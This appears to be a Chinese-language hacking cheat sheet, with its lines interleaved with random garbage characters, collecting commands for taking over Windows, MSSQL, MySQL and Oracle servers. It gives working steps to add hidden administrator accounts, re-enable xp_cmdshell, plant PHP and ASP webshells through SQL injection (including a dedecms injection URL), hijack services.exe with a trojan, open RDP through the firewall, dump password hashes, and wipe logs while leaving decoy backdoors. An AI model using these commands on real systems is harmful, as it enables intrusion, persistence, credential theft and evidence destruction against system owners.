* v% X+ o4 ^0 D# T3 |& n1.net user administrator /passwordreq:no- k1 J4 x \" c3 z) J3 s
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
4 p7 _' l) B& R8 {# C7 I% B2.比较巧妙的建克隆号的步骤* P6 I7 z& u8 l- Z0 i+ S
先建一个user的用户
5 _& N0 j1 t" o然后导出注册表。然后在计算机管理里删掉
+ K0 E7 h7 A# l+ ^4 K) ?在导入,在添加为管理员组) s7 d* z+ I( H0 W& v
3.查radmin密码* r$ I% n5 j) n1 [* g- U
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
$ j( y1 F! L/ W: {+ @9 R, f4 q4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
' B6 X2 k; b/ u h& d! A* p建立一个"services.exe"的项: n- r) j# s$ ?1 Y4 U# A+ j- p# ^ N
再在其下面建立(字符串值)
, V! a; S: D1 C1 a! d/ M键值为mu ma的全路径
# a, ~3 k3 l: e0 P. y5.runas /user:guest cmd0 | C) D% b" v1 i
测试用户权限!
) A7 \ X0 M1 [2 W6 ~# H/ ^6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
% H1 G9 c3 }0 h% i* m* y7.入侵后漏洞修补、痕迹清理,后门置放:
+ C- w/ ~7 n4 [# E$ t, A( G+ F" R ^基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
/ L" p" G, v ]/ K- D6 v8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
3 n4 j. w& Z! w# @2 X e% E$ |( y7 v
for example8 \* ~3 w0 D# @- o8 L
2 ]4 m' q; c0 m' W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'6 ~+ |/ v' |5 d' K' G" R
* D; _ Y( H: i4 e. B4 pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'1 ]! S* D, Q8 M7 u( Y* e
2 ?! R' o, t+ O, H' U, W2 n$ i% _. y9:MSSQL SERVER 2005默认把xpcmdshell 给ON了3 k( _3 B) ]/ r' L1 e0 D, W
如果要启用的话就必须把他加到高级用户模式
2 w" G( y4 y S {$ t, a可以直接在注入点那里直接注入 Q/ x7 Q# m- m) J& ?: d% `
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--- W# z" P. q6 A; a1 L0 z# ?& d
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
P! b: |6 F2 z% K; n+ D或者+ Y5 {0 E0 k* D5 }/ q$ D( G% l& I
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'- V1 H, [/ o. V7 r
来恢复cmdshell。$ D" O, I3 i7 j
- l& y$ Q- z# Z! o. b分析器/ T( e( d2 c' z B5 {
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
n3 G2 M5 ?8 W+ ]# h然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
4 i, Y9 g. z+ X3 P8 T. d x10.xp_cmdshell新的恢复办法% ]5 g: j* e2 }$ S
xp_cmdshell新的恢复办法) c6 Q9 {" ~% ~4 y1 g8 M4 g& F
扩展储存过程被删除以后可以有很简单的办法恢复:7 n' m5 r z0 L; x8 {! W
删除
* S3 ]: R6 ^+ {( ~# O( X- ldrop procedure sp_addextendedproc
9 p. a) O5 }( e$ Y0 n. C' idrop procedure sp_oacreate9 p- {. b' `& t- L% N: \
exec sp_dropextendedproc 'xp_cmdshell'
: v+ n; j% D6 E1 A6 o9 }& n( C' F l3 n1 C: K8 {; w6 ~' M
恢复
% k9 V3 w' g) F B. B. ?dbcc addextendedproc ("sp_oacreate","odsole70.dll"); C# K W5 i/ S
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
) Z2 [" s6 K; l( r% Q
/ h8 D- h7 X$ o9 r$ H这样可以直接恢复,不用去管sp_addextendedproc是不是存在+ Y6 Z& x, H& u9 U
% q2 ^# B! g3 C3 ^( }-----------------------------
# f x8 F7 u7 l2 y1 j
! a+ Q& N: p9 F8 X$ V删除扩展存储过过程xp_cmdshell的语句:
- T8 C3 m! y4 G2 Rexec sp_dropextendedproc 'xp_cmdshell'
9 d9 K: \8 E; ?. s4 V! U+ d) t% E8 Y F5 e5 ~% D
恢复cmdshell的sql语句
) |% v! L" U E' Y( K; Vexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
, J3 \# [* U$ U- c' t; v
* U3 x7 ^. L$ f2 H! B
/ n, O9 j6 S, }开启cmdshell的sql语句" r' U/ J+ i* a8 O
) {0 ]1 h$ A! E& h6 m9 x8 u. |exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'' J% r& Z2 ?" C- B+ e
m! ^! u8 W! o" N! Q. }3 y判断存储扩展是否存在4 P+ I k9 a5 O. a
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
8 o2 I1 ~( g4 l; s+ ^* ?, J( b( f返回结果为1就ok4 h: d9 w1 k9 @- ~4 D3 l
P+ Q, H' R' W, u" u1 J x恢复xp_cmdshell* |6 [8 v: n- U
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
! O2 ^: p' V9 W+ r' c返回结果为1就ok. w* S2 X$ s7 ]0 j: \5 t
* l$ Z" ^. I0 U% v6 i7 W. U否则上传xplog7.0.dll
0 r$ ~* e- ^* d9 r/ j4 sexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
4 `0 E+ M. O& L* O4 ~0 S2 s
/ U5 k1 P3 S/ ?1 H. K3 |堵上cmdshell的sql语句
6 p: @) N( `& Gsp_dropextendedproc "xp_cmdshel1 j: L E/ o7 A2 S6 j/ k* Q
-------------------------
& G9 @0 D2 `9 C j7 X" L8 g清除3389的登录记录用一条系统自带的命令:$ e$ a" _$ ^6 o8 v0 x
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f+ y. D, N2 ?& x& `- Q O* j
5 Y+ y. w5 x/ n2 X% ~( S然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件" O+ d( m/ i: S! y$ P2 @
在 mysql里查看当前用户的权限 a7 P. e$ n. G# y" `
show grants for ) d/ ]8 F# i$ ^
. \8 ?5 M) O- z& }" W1 n以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。, ?) q4 x- i" E+ s8 s+ [2 Y- U& o0 x) Y
. y+ D6 s6 H a. `7 P0 h& l# G
- T' [* e; Z2 lCreate USER 'itpro'@'%' IDENTIFIED BY '123';3 Z3 e# U' p/ V; k [6 j# @
$ m; T) I. P" Y. f' R
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION, g, w! \& T) B. K6 }, V; Z
6 I. b2 z9 J- A: Q
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0+ ~3 J, O4 \( W1 S- z
: G/ q9 N ?. A9 g
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
# x1 l2 B# u+ K8 d
6 ~' w/ j/ [, P1 e7 z搞完事记得删除脚印哟。6 T2 O! ?* w2 t! L0 N7 _! ?
" ~1 w7 s& ~& N) |! {/ A% r9 XDrop USER 'itpro'@'%';
4 S, A2 I% A+ y5 @
, G H2 j* {. T1 {& tDrop DATABASE IF EXISTS `itpro` ;
' `6 G: S3 J& A& P# V6 J( ?; ]8 Z. F" {) m& K; c! b/ G! n* ]# L5 O
当前用户获取system权限) x8 G u$ @# b/ m, ~/ }. \8 _
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact& H( V6 s. Y1 @& _0 }, F0 f1 V
sc start SuperCMD
* D; t- h# Y8 ?1 z程序代码* l% o3 \+ J2 {: F( x
<SCRIPT LANGUAGE="VBScript">
5 h5 r D$ x: } @( Yset wsnetwork=CreateObject("WSCRIPT.NETWORK")
! H4 S5 X D* k& ]+ ^" Mos="WinNT://"&wsnetwork.ComputerName
! C$ v' v* W- W0 o3 P, fSet ob=GetObject(os): h( q/ x. v! R" J
Set oe=GetObject(os&"/Administrators,group")
9 S% C0 u+ O( p; W' ASet od=ob.Create("user","nosec")- v! Y2 F, o( J; f$ w# i, I
od.SetPassword "123456abc!@#"
& o1 |! M: R( `- P a7 zod.SetInfo
- ?1 |: y. ?: i0 \% i4 R+ t& W) XSet of=GetObject(os&"/nosec",user)5 V6 h( K" k! ?, [' W8 p; [( \4 B
oe.add os&"/nosec"
* X4 E( ?8 I, f5 z</Script>" A j9 n; E; f
<script language=javascript>window.close();</script>. h$ i$ j1 J' U" _
7 ~( m. E' i& L2 m
3 w( W I" w' M% `7 q
; D4 o5 H: D: K9 \7 r( U5 P' F5 m' G7 ~& G# E4 ]% s
突破验证码限制入后台拿shell
5 {8 @( {* Y9 t# I1 U程序代码* c* w- {& E$ C: `% y/ L
REGEDIT4 " N& G, L0 d" h! C
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 3 O. D% D* ~" X" N/ h( y. i
"BlockXBM"=dword:00000000* x( F7 s: Y+ I- b7 P+ V
* M$ A$ `( f' w7 d! G( H0 C
保存为code.reg,导入注册表,重器IE7 ^$ K" v) G5 L! f3 D4 g& @
就可以了
8 q2 Z6 l% q7 r [ v9 o+ V7 }union写马; `" C# z9 }# i6 O5 c
程序代码( F8 g) z* j7 ^
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*% j# b* ~! Y# W/ o! S8 t) y
0 I/ [! |( F( f) w! u' A+ R
应用在dedecms注射漏洞上,无后台写马
* Q; j( p" q3 x+ q$ u' ^dedecms后台,无文件管理器,没有outfile权限的时候
) U9 ]; z* W, q; q d7 T: ~在插件管理-病毒扫描里
1 S% H6 D/ U* Q写一句话进include/config_hand.php里
$ X/ _; o% M t `) S- u. d# f程序代码* W2 d/ A* t0 H- {1 j
>';?><?php @eval($_POST[cmd]);?>) S: P) T, E. P
: J" E2 y: |: r5 k1 [
7 q; J; K1 C& `; F如上格式2 G+ L3 J, m, h: P* p
: w; _" {1 f- \$ @0 W# s; v i
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
( D4 Z5 B; y0 D% B* L; o! r程序代码: }/ `! e3 S6 y2 x9 R% J: c
select username,password from dba_users;4 \) K( L4 Z. V2 n3 f$ r2 ]+ l
9 a7 k/ \2 k2 Y" ~5 Y
- b: N" K2 Y4 }3 H4 x7 Cmysql远程连接用户1 v3 D' F4 p Z. F! a' e8 r
程序代码
j' _4 r7 j3 f. p( o) A) V* F! U5 h/ B& W. \
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
# m% r0 e' U) YGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
u ?0 i3 x; P/ y3 [9 oMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
( U1 g/ ?+ |) I; [MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
9 C. }0 R6 ?! r( {% f3 m
" |9 ~$ p. j7 |: V# {: Z- r3 \1 L7 [9 Z
9 m) B- S I2 j# P% P
0 ]1 U* Q7 e. }+ J+ w. m+ Q3 x& e
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
7 ^. Y* P" V: `2 l+ d; V5 `: i. H) C( \3 ~" P# I
1.查询终端端口* J$ y* ]0 a- g/ e
& c9 _; b/ n6 B, Lxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
, Q+ u2 B F, l. I8 C2 J2 O7 i( P6 K" L' ~: R5 ^
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
$ o, W+ q: o$ Ktype tsp.reg
, H" v# k4 \- e/ A1 }$ v; z; l9 G2 b r* h7 _ f: M
2.开启XP&2003终端服务
; W7 e4 l5 y: Z7 l) Q7 e
& m: D9 S* {9 a6 m2 }
8 m; R+ S; I( m0 r* OREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f9 u& }0 Z/ a: G
; {1 I1 h ~+ ] \0 R# ~
$ X6 w! h* g+ L9 O: k
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
+ g3 ]4 z4 R6 n$ r+ e7 E) O' i2 t7 ^1 E/ R
3.更改终端端口为20008(0x4E28)0 d* {# N0 o- Y/ S
# [3 t d0 Q, |; O& v1 U
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f+ P2 E$ }4 l5 `# b' e
. X! i- D+ T3 S. ^! K4 s$ ^& C5 c
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f8 ^) x* K6 e" v0 l! @
5 d, T7 Q; j7 b2 `& s# F& C1 o4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
! l: }$ @0 y' e8 _3 c9 u$ c/ U) n! O, [+ Q% l
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f" U6 Y& ^+ ^3 R
z: y8 d& D0 g1 F/ U
/ U3 x1 s$ t: f$ S5 N+ c6 A2 v: R5.开启Win2000的终端,端口为3389(需重启)
1 z& i4 j" |3 G% A8 X& h) {5 _' o6 _
echo Windows Registry Editor Version 5.00 >2000.reg
$ I) F3 ^1 p) d& K8 l" {' t9 Yecho. >>2000.reg
# [( J% R4 M, Z; ]4 j0 Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 6 ]5 I; N% T: D; m/ z0 {
echo "Enabled"="0" >>2000.reg
# |* s2 s( d5 s; k& pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 7 U+ f& @. _' b
echo "ShutdownWithoutLogon"="0" >>2000.reg
1 R+ Y0 G5 y# wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 6 ]9 s" o5 c( V' w- x
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg . ^3 O" B7 P7 o5 G9 Q6 Q9 {4 v+ k* P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ) i% o. _# P8 ^, ]
echo "TSEnabled"=dword:00000001 >>2000.reg
+ K) h5 M1 i$ u1 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
. A( U! Y) O, G Pecho "Start"=dword:00000002 >>2000.reg
" N, p2 A7 s: t, X+ w2 G; L. {( Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg , }# Y5 k; i" C# d6 o
echo "Start"=dword:00000002 >>2000.reg
0 Q9 t: p: u8 }/ Y( Wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
* R) \, R. m+ \7 B* E5 ?* techo "Hotkey"="1" >>2000.reg
; E. s1 T. D% X+ O2 Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 0 ?3 r9 H9 ^ y/ d# y9 ?5 h
echo "ortNumber"=dword:00000D3D >>2000.reg
/ N! ~# V3 H$ V8 R0 Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg # P3 v( Y/ z& H
echo "ortNumber"=dword:00000D3D >>2000.reg
' K' u. z4 B; j: r! j) o3 p* C) R9 \: t6 R- R* _
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
9 p$ f" j- }+ P3 E
7 Y# G1 E% }: q D% D@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
# W- r9 p% f; `; M# L% R(set inf=InstallHinfSection DefaultInstall)
5 ~0 ]2 c! Y8 Iecho signature=$chicago$ >> restart.inf
- m Q- z5 p( N7 f# O- Kecho [defaultinstall] >> restart.inf! g) F& p h/ g# a2 B7 {
rundll32 setupapi,%inf% 1 %temp%\restart.inf8 J' k1 E( e4 P% u0 S: `3 `( [$ H
6 Q( u3 H! A8 E2 Z
% f+ W( O6 T3 H* j. y7.禁用TCP/IP端口筛选 (需重启)
/ n2 q0 I- D, z. D) a+ J3 i9 X8 E- r5 Z) m
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f% _ h- e# `- S" w
7 V% c4 z* s) m! {8.终端超出最大连接数时可用下面的命令来连接
3 N* }2 r/ K- h- V0 _6 x% M# c
: D% N+ a" t& D+ K. U8 G8 Umstsc /v:ip:3389 /console
' @7 s6 x" U3 o" s* `8 n
- L) U3 K H, n2 I' h1 G9.调整NTFS分区权限/ i2 C" j+ m; _5 [
% }0 V0 f" C8 j8 O$ @: F8 X9 w4 m
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)' X- ]8 x& X& v2 m9 h4 L& T6 j
0 K r$ W4 G& B
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件): ~" G% J- m: A5 a9 d( X; @* u( ~
+ M$ }. z, h( r$ h0 j------------------------------------------------------6 Q: M! j0 d& z0 D F& `2 Y
3389.vbs ' x7 Z' Q4 c: c$ H' t
On Error Resume Next
/ m% u$ T+ f D$ B6 hconst HKEY_LOCAL_MACHINE = &H80000002+ u0 O4 k0 C0 u2 v& x
strComputer = "."
) c3 a* B6 \2 `Set StdOut = WScript.StdOut
9 t5 z6 U e* qSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_3 f+ G# J6 n% J
strComputer & "\root\default:StdRegProv")4 p2 R) w; S# q' w/ M6 ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
$ ~& ?) N9 W# |( @' poreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
8 d: P5 X6 x" T& n0 O: ]+ D' }strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
* t3 v9 b* {8 Q: k6 t' `8 eoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; @4 ?5 k5 Z% J( OstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"5 n v5 f8 c7 o" E$ E
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
' W0 K2 N/ h% Y3 b5 |( vstrValueName = "fDenyTSConnections"" E5 G8 [* g2 V; u' w( K1 t
dwValue = 0' e+ h" P' e4 W; k; m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
9 k; ^" }: z \" Q" ?strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
- d. N5 u8 e, Y: \1 ?* BstrValueName = "ortNumber"
. p* b6 L/ w, K0 X9 [# D9 G* PdwValue = 3389
3 U. Z0 k/ k3 h0 N3 I; Goreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! q2 o2 t6 _0 m$ W# W9 N1 |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
. C2 i! m3 J* @$ C Z B) D) PstrValueName = "ortNumber"
: s0 N. q6 E6 }& R( e# DdwValue = 3389
& F! J3 u5 D9 g$ N* Woreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
; R6 l! A8 z' J# ]$ r! l( Q4 @Set R = CreateObject("WScript.Shell") / L& q) h8 X8 c/ L3 k1 a& N
R.run("Shutdown.exe -f -r -t 0") 9 ^( ?* k/ N& Y
: J" `( v9 I% J删除awgina.dll的注册表键值
- E$ b; n# @( @# m1 W* m程序代码
7 l) b7 u" H9 s% @" t6 W6 T/ [/ j9 O5 ?
2 d0 H' |8 \: U7 Z! p- D* ~reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f3 D8 c6 g1 o( k# H4 c
1 U9 }; M7 r9 E0 l1 T0 S
' `8 L+ l2 W q- c D P
) g! M* S9 W# k* U; B7 R
" {9 m7 T8 ^5 [; J" C& {/ Z/ o
程序代码
" `2 t* c( C$ e5 uHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash/ o! X4 x! ?2 y: ]; o" i8 m
! \& v8 m8 `! @: Z& A* h设置为1,关闭LM Hash: p" S2 U6 n, m' I( Q; l' |
4 I3 L9 q$ X0 h$ q/ ]数据库安全:入侵Oracle数据库常用操作命令
7 T. n- H& i- K: d" T$ w4 A最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
) n& C1 Q v$ S1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
; v [+ Y" g4 _2 u: I2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;$ T5 y* C2 O! f0 s1 A, L7 `
3、SQL>connect / as sysdba ;(as sysoper)或7 q6 U' H( g8 X) n# k% c* b
connect internal/oracle AS SYSDBA ;(scott/tiger)
H# n. p) f( a) Y6 Tconn sys/change_on_install as sysdba;
) P* O* \( l, O+ e) R. k, @4、SQL>startup; 启动数据库实例
1 R1 G2 D1 i. X* L. F1 I5、查看当前的所有数据库: select * from v$database;
( \- {# F! n" H+ m+ Kselect name from v$database;
2 F O e- Z5 [0 |+ b2 h6、desc v$databases; 查看数据库结构字段
1 U: V" l( `+ I) L# t, W7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
5 Y. h) p. k4 {3 b# x/ Z9 J' w7 HSQL>select * from V_$PWFILE_USERS;5 Y1 I8 d) W# U& E6 V9 q
Show user;查看当前数据库连接用户
; O# \ h6 B$ p* t0 t A9 r8、进入test数据库:database test;" G* d. L' q- B; V: L( X) r. g6 H
9、查看所有的数据库实例:select * from v$instance;7 A/ Q9 Q: G2 i5 L+ e( \! l; I
如:ora9i9 T! I8 F/ x) D% J2 K3 `3 m
10、查看当前库的所有数据表: w) V, r/ Q4 v0 n1 X# `
SQL> select TABLE_NAME from all_tables;
: L- J0 @! A, B" L+ Cselect * from all_tables;- p6 Q; G5 K( c$ p, v7 Q
SQL> select table_name from all_tables where table_name like '%u%';9 M6 w& \7 }3 ^% a
TABLE_NAME- V( Y# _% R6 _, z) K, R
------------------------------
! q1 W1 Y9 `9 O$ x_default_auditing_options_6 c+ ?% e' F% D3 _" D
11、查看表结构:desc all_tables;
+ C8 u1 k- {9 e h$ T12、显示CQI.T_BBS_XUSER的所有字段结构:
( P9 Z7 `$ @8 |: ?( b! k Idesc CQI.T_BBS_XUSER;
8 K5 _, {! ?( E. t S4 I13、获得CQI.T_BBS_XUSER表中的记录:0 i; c& r/ o# w3 x$ M
select * from CQI.T_BBS_XUSER;( ^& `5 Y: S; [9 I5 e
14、增加数据库用户:(test11/test)
2 e0 X6 M$ H- S: ncreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
1 E2 B4 s+ m1 K; x15、用户授权:
9 @8 h; U. b) J. ggrant connect,resource,dba to test11;
% |- i) v$ x/ r, x t: N! Egrant sysdba to test11;
" G3 w' [. T: }9 [commit;
& ^6 {% G4 k# x! J* _- b. c16、更改数据库用户的密码:(将sys与system的密码改为test.)
2 ~3 }4 J& v# J! m1 [' jalter user sys indentified by test;. l8 C+ g: M. U2 y4 ]4 ]6 e
alter user system indentified by test;; w, k! M( b+ y" s% }( O
0 y' x4 m) ?# ]% {applicationContext-util.xml& H& o' _7 b# O! L; [
applicationContext.xml
" G8 i5 A/ R. m1 w6 tstruts-config.xml
: N$ w3 f/ Y C; Eweb.xml' z! r; l/ y5 c$ f
server.xml& m" ^7 Y" M7 T9 b3 j+ d
tomcat-users.xml( F0 H; k% Y1 W% L
hibernate.cfg.xml
/ U/ r- W9 L/ {: ?# E) {database_pool_config.xml
8 g5 n9 q' M8 Q# C
% o! u3 F4 M0 [" L$ a" Q
9 l- ]) ]0 H6 _5 o6 h. h\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
1 n) |, \% U; W/ J\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini( W0 f7 {% I# ]/ ]) `8 P) W; B
\WEB-INF\struts-config.xml 文件目录结构3 [: Z; F6 k6 u6 d+ R/ p U" X7 F% p
1 G3 J# ?: @# N7 r1 H I
spring.properties 里边包含hibernate.cfg.xml的名称
: N+ i+ q5 b8 D8 L' Y' b8 _3 g, e* w( ]1 x& ], s% ]" s6 F
6 Y f) t, [! d& Y3 UC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml/ g8 ?+ t; v M! z+ E2 z
: d+ p5 g6 |1 x% a+ j3 b; ?
如果都找不到 那就看看class文件吧。。
6 w0 \, K Q+ o E: n1 ~5 E6 X
6 c3 c) x& A' F测试1:9 v/ c( w9 |& j. V. x
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
& s0 X. y' V& g
$ T) S# ?. d G% v) Z' q测试2:& S) ~7 y- _# b% s, t
. @7 l8 b: J: ]( }create table dirs(paths varchar(100),paths1 varchar(100), id int)
( a8 P' c/ i1 G$ r, d; N8 r
7 B+ e9 E0 P+ l3 ^* Y% g0 `delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--0 f2 L2 K, Z; c3 t
: w- l0 [3 z. O; b- hSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
$ e3 S% g4 q" x% _# f$ k; D3 e& U z
查看虚拟机中的共享文件:) V% A6 P, e1 T. X% T
在虚拟机中的cmd中执行
2 O3 K4 x/ X/ |' ^/ _\\.host\Shared Folders
" ^% F! j9 k/ o/ C5 ]% r
+ r# Q Q. ^0 y; L" s2 tcmdshell下找终端的技巧
: ~1 ]# ?9 k" O, r' Q) _0 r找终端:
0 N/ _8 M$ F4 S0 d' B: n! W5 i第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 7 n- V3 r! d! n0 f3 _6 e, L: B
而终端所对应的服务名为:TermService
& W- R0 I& v( [# H第二步:用netstat -ano命令,列出所有端口对应的PID值! 4 q P9 O, Q! z+ u! N" B
找到PID值所对应的端口% [6 N# S. V3 P% P
& ` z( _' S; y8 l' P7 n
查询sql server 2005中的密码hash( N& m+ w+ a9 D# G7 F+ ~+ L1 h# B
SELECT password_hash FROM sys.sql_logins where name='sa'( u) z- I& ?; f+ ^0 [4 Z* Y! m
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
3 X: W, s+ F+ S+ daccess中导出shell
, l* h: C; R; A, P) Q2 ], j4 c: \9 M' \2 I5 O
中文版本操作系统中针对mysql添加用户完整代码: ]5 ^" R, {7 K, U2 e
7 y4 R g* v, C$ j$ j& Z; Guse test;
6 {. U* H0 z/ c" x# f c" j0 ycreate table a (cmd text);- h* l4 X. G$ C5 y
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
